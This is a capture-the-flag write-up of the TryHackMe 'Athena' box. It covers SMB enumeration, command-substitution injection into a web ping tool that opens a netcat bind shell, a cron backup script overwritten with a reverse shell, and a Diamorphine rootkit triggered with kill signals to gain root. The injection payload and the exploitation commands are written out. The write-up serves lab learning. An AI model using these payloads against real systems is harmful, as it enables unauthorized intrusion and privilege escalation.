We covered the boot2root challenge Athena from TryHackMe. We scanned the machine with Nmap and discovered SMB server from which we extracted a note that pointed us to a directory on the webserver where we discovered a ping tool running. We used command substitution to inject a bind shell and land the first foothold. We discovered a backup script running on a periodic basis as another user. We modified the script to execute reverse shell and opened another session as the user Athena. Upon enumeration, we found that the user Athena can load kernel modules as sudo using insmod without the need for root password. We downloaded the kernal module “venom.ko” and used Ghidra to reverse engineer the binary. We discovered that it’s a rootkit and after code analysis we were able to interact with the module to call a function that escalated privileges from Athena to Root.
Initial Enumeration
I started by running an nmap
scan to identify open ports on the target machine. I found ports 22 (SSH) and 80 (HTTP) to be open. The HTTP server on port 80 initially showed a simple page with no obvious vulnerabilities, and directory brute-forcing with tools like Gobuster didn’t reveal anything useful.
SMB Enumeration and Discovery
Even though it didn’t initially show up in my nmap
scan, I discovered an SMB (Server Message Block) service. I connected to the SMB share anonymously (without a password) using smbclient //<target_IP>/public
. Inside the public
share, I found a text file. The content of this file was a note about a new “ping system” being developed and provided a path to access it.
Exploiting the Ping Tool (Command Injection)
Accessing the revealed path led me to a simple web-based ping tool. I attempted standard command injection techniques like ;
and &&
, but they were blocked by filters. I then successfully bypassed these filters using command substitution.
I set up a bind shell using nc
(netcat) via command substitution, making the target machine listen on a specific port. The command I injected into the ping tool was similar to: <IP_to_ping> -c1 $(nc -lp 4545 -e /bin/bash)
. I then connected to this bind shell from my machine using nc <target_IP> 4545
, which gave me initial access as the www-data
user (the Apache web server user).
Privilege Escalation to User “Athena”
To escalate my privileges, I uploaded the pspy64
tool to the target machine to monitor processes and cron jobs. I observed a backup script running at regular intervals by a user with UID 1001, which I identified as the user “Athena.” I found that the www-data
user owned this backup script, meaning I could modify it.
My strategy was to replace the script’s content with a reverse shell. When the cron job executed the script as “Athena,” my reverse shell would run, giving me access as “Athena.” I prepared a reverse shell payload and inserted it into the backup script. I started a listener on my machine using nc -lvnp 4547
, and when the cron job executed, I successfully obtained a shell as “Athena.”
Privilege Escalation to Root (Rootkit Analysis)
As “Athena,” I ran sudo -l
to check my sudo privileges. This revealed that I could execute the insmod
command as root without a password, specifically to load a kernel module named venom.ko
.
I downloaded the venom.ko
module to my attacker machine and analyzed it using Ghidra. My analysis revealed that venom.ko
was a rootkit called “Diamorphine.” Rootkits are designed to hide their presence. The Diamorphine documentation showed that sending signal 63
to the rootkit would make it visible. Further analysis of the rootkit’s code in Ghidra (specifically the hacked_kill
function) showed that if a variable was set to a specific hex value (decimal 57), a give_root
function would be called.
I first loaded the module using sudo /sbin/insmod /home/athena/venom.ko
. Then, I used lsmod | grep venom
to confirm the module was initially hidden. Sending signal 63
(e.g., kill -63 0
) made the rootkit visible in lsmod
. Finally, sending signal 57
(e.g., kill -57 0
) triggered the give_root
function. Typing id
confirmed that I now had root privileges!
Technical Commands Used:
nmap -Pn -A <target_IP>
smbclient //<target_IP>/public
ls
(withinsmbclient
)get <filename>
(withinsmbclient
)cat <filename>
<IP_to_ping> -c1 $(nc -lp 4545 -e /bin/bash)
(Command injection for bind shell)nc <target_IP> 4545
id
cat /etc/passwd
ls -la /usr/share/backup
cat /usr/share/backup/backup.sh
rm /usr/share/backup/backup.sh
echo '<reverse_shell_payload>' > /usr/share/backup/backup.sh
chmod +x /usr/share/backup/backup.sh
nc -lvnp 4547
sudo -l
sudo /sbin/insmod /home/athena/venom.ko
lsmod | grep venom
kill -63 <PID_of_rootkit_or_0>
kill -57 <PID_of_rootkit_or_0>